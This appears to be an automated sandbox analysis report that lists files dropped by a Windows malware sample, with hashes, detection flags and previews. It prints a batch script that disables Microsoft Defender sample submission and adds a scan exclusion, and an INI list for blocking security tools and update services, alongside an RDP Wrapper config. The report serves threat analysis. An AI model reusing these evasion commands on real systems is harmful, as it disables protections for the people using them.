                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):115712
                                                    Entropy (8bit):6.277217301921545
                                                    Encrypted:false
                                                    SSDEEP:1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
                                                    MD5:D0F0423AEEE6B6FF6754D860603D46D0
                                                    SHA1:A06F3B9605B3398BA68154DA39ADF26DDEE41743
                                                    SHA-256:81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
                                                    SHA-512:C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1929
                                                    Entropy (8bit):5.478004922553954
                                                    Encrypted:false
                                                    SSDEEP:48:CFdHr+54yclDEDsXcm9FL4gEu5ZR5+sR5CdLh5HR5OKXbeD:idHxNBJ9VTgOD
                                                    MD5:42A1A5C102E9A27C3EC501E05D386BCB
                                                    SHA1:0B260831794AE2CB3E44F751203ABB332800E5A2
                                                    SHA-256:F08AF5F1666FC530AE8B181C3D792C409842B965E2D27E7940A9CAD59F6C41E2
                                                    SHA-512:8E49E45F24295C69A42A747AF1162F6FE570FE80770292666C5F41F82DE9613AD4A3C86E958A3D6FAC7F36B99BFFDAE585F3906E819213D6F2A2B764717A0E2D
                                                    Malicious:false
                                                    Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffda557e1cc)..[I] (tcp_connect) -
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):91136
                                                    Entropy (8bit):6.2290767543196575
                                                    Encrypted:false
                                                    SSDEEP:1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
                                                    MD5:4C086C8F48C4D0F8C20410E60340AEC9
                                                    SHA1:77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
                                                    SHA-256:0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
                                                    SHA-512:CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:Generic INItialization configuration [SLPolicy]
                                                    Category:dropped
                                                    Size (bytes):441513
                                                    Entropy (8bit):5.449545529389614
                                                    Encrypted:false
                                                    SSDEEP:768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
                                                    MD5:5FCB4B6362E04A8D1C6ECD33AD246FB9
                                                    SHA1:E198D3E81C4B8527451133BCEAFA799D2115A8BB
                                                    SHA-256:060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
                                                    SHA-512:B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
                                                    Malicious:false
                                                    Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                                    Process:C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):10451376
                                                    Entropy (8bit):6.708065758846917
                                                    Encrypted:false
                                                    SSDEEP:196608:diRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEhB:diRsCKCsU1CPwDvt3uFd9CMEX
                                                    MD5:312704A6232D74733DE04C6E00F8CF21
                                                    SHA1:2B4820AC82C5B851464D6563FA6EA0CB3E3629C2
                                                    SHA-256:8D11890F2B70BA2ABB4B017B05F3BB1D20ECA6AD3EB84F0251E0857C77682C9B
                                                    SHA-512:5C32B9A8267C57CE640E7612BDECD7D7EC67F4E0AB48DD97A53373D220765AB234BC28779F524E788E1E03D8857CCD7755A22F19E1A34AE36FD6F33444016F01
                                                    Malicious:false
                                                    Preview:_W&T....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B.....................................................................................................................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Preview:@...e...........................................................
                                                    Process:C:\Users\user\Desktop\file.exe
                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):10639360
                                                    Entropy (8bit):7.4147455331909855
                                                    Encrypted:false
                                                    SSDEEP:196608:PE1LTxbO313norADHLHhHiVulZ/KHNV4G:PyxbOFC8b/KtV4
                                                    MD5:7D1755E8E41A6C2F08D2FAEFFDF9DAD1
                                                    SHA1:C04D89F1054F2EE34B548126A5ADD4EEE4751AE4
                                                    SHA-256:44CF4321C138C4CACECC95DEBA735F508C96049E7F0E8F0538684DC4F0C1E9A5
                                                    SHA-512:B099238838B0D8B258529126B3C279AC735FEFF778D52C3117EB3CD587267A145A09BC1317FB412B2C810EA8B2232A8218FE459E33AC99F9B48DECFDC62E4816
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....T.................@...................................a.....`... ..............................................................@..d...........................................`/..(....................................................text...(...........................`..`.data.............................@....rdata...^......`.................@..@.pdata..d....@.......(..............@..@.xdata.......P.......2..............@..@.bss....p....`...........................idata...............<..............@....CRT....`............R..............@....tls.................T..............@....reloc...............V..............@..B................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Users\user\Desktop\file.exe
                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):98304
                                                    Entropy (8bit):6.298274541598319
                                                    Encrypted:false
                                                    SSDEEP:1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
                                                    MD5:319865D78CC8DF6270E27521B8182BFF
                                                    SHA1:716E70B00AA2D154367028DE896C7D76C9D24350
                                                    SHA-256:A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
                                                    SHA-512:78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....|.................@....................................#7....`... ..............................................................................................................a..(....................... ............................text...............................`..`.data...............................@....rdata...R... ...T..................@..@.pdata...............R..............@..@.xdata...............\..............@..@.bss....0................................idata...............f..............@....CRT....`............z..............@....tls.................|..............@....reloc...............~..............@..B................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\file.exe
                                                    File Type:DOS batch file, ASCII text
                                                    Category:dropped
                                                    Size (bytes):259
                                                    Entropy (8bit):4.933902901538645
                                                    Encrypted:false
                                                    SSDEEP:6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
                                                    MD5:261A842203ADB67547C83DE132C7A076
                                                    SHA1:6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
                                                    SHA-256:49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
                                                    SHA-512:7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
                                                    Malicious:true
                                                    Preview:@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1
                                                    Process:C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):3747
                                                    Entropy (8bit):5.50060725558016
                                                    Encrypted:false
                                                    SSDEEP:96:i6BJ9VTDT0HU0Hn0H1eA0Hu0H+kQHR3wPD07I0HNVHGHX0HltHl:vDT3T000H08A0O0TQxAPD07I0tVm30Ff
                                                    MD5:D57E5331C652806BFFD879DA58800478
                                                    SHA1:BA3947EDB5ABECB6A02D9970AACD45C8174280E5
                                                    SHA-256:086497874D081693AE45086C953AA1107EEEC029249FFC34736AF1590E453A4D
                                                    SHA-512:02261E32F0D8E6AAC7ABF6ECCFDE9893225A7BAE625B622DDC9B0F693C1C2C78547EDCC57D0E9C997329B9DACDFE4882F34A45D3E203CBA481FFB33586E633B7
                                                    Malicious:false
                                                    Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea
                                                    Process:C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe
                                                    File Type:Generic INItialization configuration [svc]
                                                    Category:dropped
                                                    Size (bytes):195
                                                    Entropy (8bit):4.692426693515089
                                                    Encrypted:false
                                                    SSDEEP:3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
                                                    MD5:E025B58CB2D118FAFAE00850EE91C5F9
                                                    SHA1:DD23CE328F593AF74455F2C2F805B662466A1205
                                                    SHA-256:897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
                                                    SHA-512:5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
                                                    Malicious:false
                                                    Preview:[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..
                                                    Process:C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):24064
                                                    Entropy (8bit):5.146697675692133
                                                    Encrypted:false
                                                    SSDEEP:384:6bbEbNQ6s69WS8vv88o888888888888888j888888888888e88888088888888AB:6bbEbNQ6s69WS8vv88o888888888888G
                                                    MD5:737D7DD6A6C89197004B5D6DF84F7F89
                                                    SHA1:AAF5F200FBD5DA4C6F7C5A74135A543F6A087424
                                                    SHA-256:2E0E497C9FC304F7CB6481DAAA47C668623C50B8418E041C066DF1FE06EA1C2C
                                                    SHA-512:0ECF85D9FE1B0FF6BC7A0E0157F73D0D6A1DEEEAC253187439D743A4CEB61DB7D5C5A1D575A6E1B6EF1930CE8D700A93C07760D8E5A7262C3E162BAF3F76781F
                                                    Malicious:false
                                                    Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):91136
                                                    Entropy (8bit):6.2290767543196575
                                                    Encrypted:false
                                                    SSDEEP:1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
                                                    MD5:4C086C8F48C4D0F8C20410E60340AEC9
                                                    SHA1:77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
                                                    SHA-256:0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
                                                    SHA-512:CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
                                                    Malicious:true
                                                    Antivirus:
